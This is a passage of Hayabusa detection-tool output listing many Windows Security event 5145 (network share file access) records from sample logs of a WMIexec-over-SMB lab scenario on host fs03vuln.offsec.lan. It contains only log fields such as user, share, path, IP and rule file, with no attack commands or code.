Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 